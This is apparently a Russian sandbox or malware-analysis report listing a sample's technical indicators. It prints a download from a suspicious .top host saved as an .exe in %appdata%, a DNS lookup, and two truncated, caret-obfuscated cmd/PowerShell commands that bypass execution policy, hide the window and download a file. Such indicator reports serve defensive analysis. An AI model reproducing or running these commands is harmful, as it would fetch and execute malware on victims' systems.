Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWer^Sh^e^lL^.exe -^eXe^CUt^IO^nPoLI^cy ByPaSS ^-nopRoFIL^E -w^iN^d^ow^ST^y^LE^ h^iD^D^E^n ^(NeW^-o^b^j^ecT^ ^Sy^s^T^em^.nET.^w^Ebc^LIen^t)^.^D^OW^n^L^oaDfiLe^('http://www.fapoergol....
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /C "POWer^Sh^e^lL^.exe -^eXe^CUt^IO^nPoLI^cy ByPaSS ^-nopRoFIL^E -w^iN^d^ow^ST^y^LE^ h^iD^D^E^n ^(NeW^-o^b^j^ecT^ ^Sy^s^T^em^.nET.^w^Ebc^LIen^t)^.^D^OW^n^L^oaDfiLe^('http://www.fapoergol....' (со скрытым окном)